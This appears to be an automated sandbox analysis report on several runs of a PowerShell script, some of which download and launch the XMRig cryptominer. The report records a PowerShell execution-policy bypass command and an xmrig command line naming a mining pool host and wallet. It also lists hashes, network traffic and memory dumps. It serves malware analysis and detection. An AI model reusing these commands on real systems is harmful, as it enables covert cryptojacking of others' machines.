memory/4880-95-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp

memory/3256-96-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-97-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-98-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-99-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-100-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-101-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-102-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-103-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-104-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-105-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-106-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-107-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-108-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-109-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-110-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-111-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-112-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-113-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-114-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-115-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-116-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-117-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-118-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-119-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-120-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-121-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-122-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-123-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-124-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-125-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-126-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-127-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-128-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-129-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-130-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-131-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-132-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-133-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-134-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-135-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-136-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-137-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-138-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-139-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-140-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-141-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-142-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-143-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-144-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-145-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-146-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-147-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-148-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-149-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-150-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-151-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-152-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-153-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-154-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-155-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-156-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:18

Platform

win11-20240508-en

Max time kernel

1646s

Max time network

1657s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
IE 52.111.236.22:443 tcp

Files

memory/2632-0-0x00007FFF8D633000-0x00007FFF8D635000-memory.dmp

memory/2632-6-0x000001B849210000-0x000001B849232000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cisfmsdk.qxc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2632-10-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp

memory/2632-11-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp

memory/2632-12-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp

memory/2632-13-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp

memory/2632-14-0x00007FFF8D633000-0x00007FFF8D635000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:50

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1805s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 198.111.78.13.in-addr.arpa udp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp

Files

memory/5056-2-0x00007FF8153F3000-0x00007FF8153F4000-memory.dmp

memory/5056-5-0x000001E8C8F40000-0x000001E8C8F62000-memory.dmp

memory/5056-7-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp

memory/5056-10-0x000001E8C90F0000-0x000001E8C9166000-memory.dmp

memory/5056-11-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a5qsnrce.mre.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5056-28-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp

memory/5056-52-0x000001E8C90D0000-0x000001E8C90E2000-memory.dmp

memory/5056-65-0x000001E8C90B0000-0x000001E8C90BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1736-94-0x00000184BB6A0000-0x00000184BB6C0000-memory.dmp

memory/5056-95-0x00007FF8153F3000-0x00007FF8153F4000-memory.dmp

memory/5056-96-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp

memory/1736-97-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/5056-98-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp

memory/1736-99-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-100-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-101-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-102-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-103-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-104-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-105-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-106-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-107-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-108-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-109-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-110-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-111-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-112-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-113-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-114-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-115-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-116-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-117-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-118-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-119-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-120-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-121-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-122-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-123-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-124-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-125-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-126-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-127-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-128-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-129-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-130-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-131-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-132-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-133-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-134-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-135-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-136-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-137-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-138-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-139-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-140-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-141-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-142-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-143-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-144-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-145-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-146-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-147-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-148-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-149-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-150-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-151-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-152-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-153-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-154-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-155-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-156-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-157-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-158-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-159-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-160-0x00007FF614920000-0x00007FF615553000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:09

Platform

win11-20240419-en

Max time kernel

1765s

Max time network

1777s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

memory/2440-0-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttbimhkb.tdq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2440-9-0x000001A87C190000-0x000001A87C1B2000-memory.dmp

memory/2440-10-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2440-11-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2440-12-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2440-13-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2440-14-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:14

Platform

win7-20240508-en

Max time kernel

1559s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Network

N/A

Files

memory/1252-4-0x000007FEF57EE000-0x000007FEF57EF000-memory.dmp

memory/1252-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/1252-6-0x0000000001E00000-0x0000000001E08000-memory.dmp

memory/1252-7-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

memory/1252-9-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

memory/1252-10-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

memory/1252-11-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

memory/1252-8-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

memory/1252-12-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:16

Platform

win11-20240508-en

Max time kernel

1742s

Max time network

1751s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/2628-0-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0u44g2s.p3r.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2628-9-0x00000233FA960000-0x00000233FA982000-memory.dmp

memory/2628-10-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2628-11-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2628-12-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2628-13-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2628-14-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:16

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 94.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/600-4-0x00007FF85FEF3000-0x00007FF85FEF4000-memory.dmp

memory/600-5-0x000001CD6DA20000-0x000001CD6DA42000-memory.dmp

memory/600-6-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/600-9-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/600-10-0x000001CD6DBF0000-0x000001CD6DC66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f2exdr3m.1y4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/600-25-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/600-48-0x000001CD6DF70000-0x000001CD6DF82000-memory.dmp

memory/600-61-0x000001CD6DAB0000-0x000001CD6DABA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/924-90-0x00000139DF730000-0x00000139DF750000-memory.dmp

